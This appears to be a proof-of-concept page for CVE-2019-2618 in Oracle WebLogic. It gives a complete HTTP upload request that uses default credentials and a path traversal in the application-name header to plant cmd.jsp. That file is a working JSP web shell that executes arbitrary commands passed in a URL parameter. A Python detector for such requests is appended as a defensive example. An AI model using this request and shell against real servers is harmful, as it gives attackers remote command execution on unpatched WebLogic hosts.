CVE-2019-2618 PoC — Oracle Fusion Middleware WebLogic Server Access Control Error Vulnerability

Source
Associated Vulnerability
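Title: Oracle Fusion Middleware WebLogic Server Access Control Error Vulnerability (CVE-2019-2618)
Description: Oracle Fusion Middleware is a business innovation platform from Oracle for enterprise and cloud environments. The platform provides middleware, software collections and related functions. WebLogic Server is one of its components, an application server suited to cloud and traditional environments. A security vulnerability exists in the WLS Core Components subcomponent of the WebLogic Server component of Oracle Fusion Middleware, versions 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. An attacker can exploit this vulnerability for unauthorized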
Description
Weblogic Unrestricted File Upload
Readme
### PoC

```
POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
Host:  127.0.0.1:7001
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html, image/gif, image/jpeg, */*; q=.2
Connection: keep-alive
username: weblogic
password: weblogic
wl_request_type: app_upload
wl_upload_application_name: \\..\\tmp\\_WL_internal\\bea_wls_internal\\9j4dqk\\war
wl_upload_delta: true
archive: true
serverName: pyn3rd
server_version: 10.3.6.0
Content-Type: multipart/form-data; boundary=---------------------------55365303813990412251182616919
Content-Length: 982

-----------------------------55365303813990412251182616919
Content-Disposition: form-data; name="img"; filename="cmd.jsp"
Content-Type: application/octet-stream

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<html>
<body>
<form  method="GET" name="myform" action="">
<input type="text"  name="cmd">
<input type="submit" value="send">
</form>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<br>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
                }
        }
%>
</pre>
</body>
</html>
-----------------------------55365303813990412251182616919--
```
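A defender-side check for requests shaped like the one above, as an added example that is not part of the original README: it flags uploads to the DeploymentService endpoint whose `wl_upload_application_name` header contains a `..` path segment or whose multipart part carries a JSP file. The function names, indicator labels and sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote

ENDPOINT = "/bea_wls_deployment_internal/DeploymentService"
SCRIPT_EXT = (".jsp", ".jspx")

def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split()
    if len(parts) < 2:  # malformed request line
        return "", "", {}, ""
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return parts[0].upper(), parts[1].split("?", 1)[0], headers, body

def has_traversal(value):
    """True if value holds a '..' segment between / or \\ separators."""
    return ".." in re.split(r"[\\/]+", unquote(value))

def findings(raw):
    """Indicators matched by one request; empty for other endpoints."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path != ENDPOINT:
        return []
    hits = []
    if headers.get("wl_request_type") == "app_upload":
        hits.append("app_upload")
    if has_traversal(headers.get("wl_upload_application_name", "")):
        hits.append("traversal_in_application_name")
    names = re.findall(r'filename="([^"]*)"', body)
    if any(n.lower().endswith(SCRIPT_EXT) for n in names):
        hits.append("script_file_in_upload")
    return hits

# Constructed samples: same header names as the request above, placeholder bodies.
_HEAD = ("POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1\n"
         "Host: 127.0.0.1:7001\nwl_request_type: app_upload\n")
_PART = '\n--b\nContent-Disposition: form-data; name="img"; filename="%s"\n\nx\n--b--\n'
FLAGGED = _HEAD + "wl_upload_application_name: \\\\..\\\\tmp\\\\example\\\\war\n" + _PART % "a.jsp"
PLAIN = _HEAD + "wl_upload_application_name: inventory\n" + _PART % "inventory.war"

if __name__ == "__main__":
    for label, raw in (("flagged", FLAGGED), ("plain", PLAIN)):
        print(label, findings(raw))
```

The same header checks can be applied to proxy or WAF logs that record request headers; the traversal indicator is the one to alert on, since an application name has no reason to contain `..`.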
File Snapshot

[4.0K] /data/pocs/b9df72e25bac1ebc0152323d37341ba3d737210a
└── [1.5K] README.md

0 directories, 1 file